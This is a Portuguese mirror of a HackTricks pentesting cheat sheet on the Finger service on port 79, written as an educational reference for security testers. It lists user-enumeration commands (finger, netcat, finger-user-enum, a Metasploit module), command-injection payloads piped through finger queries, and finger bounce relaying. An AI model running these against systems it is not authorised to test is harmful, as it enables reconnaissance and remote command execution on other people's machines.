mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-14 07:13:01 +00:00
3.9 KiB
3.9 KiB
79 - Pentesting Finger
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
Informações Básicas
O programa/serviço Finger é utilizado para obter detalhes sobre usuários de computador. Tipicamente, as informações fornecidas incluem o nome de login do usuário, nome completo, e, em alguns casos, detalhes adicionais. Esses detalhes extras podem incluir a localização do escritório e número de telefone (se disponível), o horário em que o usuário fez login, o período de inatividade (tempo ocioso), a última vez que o usuário leu o e-mail, e o conteúdo dos arquivos de plano e projeto do usuário.
Porta padrão: 79
PORT STATE SERVICE
79/tcp open finger
Enumeração
Obtenção de Banner/Conexão Básica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeração de Usuários
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, você pode usar finger-user-enum do pentestmonkey, alguns exemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap executa um script para usar scripts padrão
Metasploit usa mais truques do que o Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Execução de Comando
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Use um sistema como um relé de finger
finger user@host@victim
finger @internal@external
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.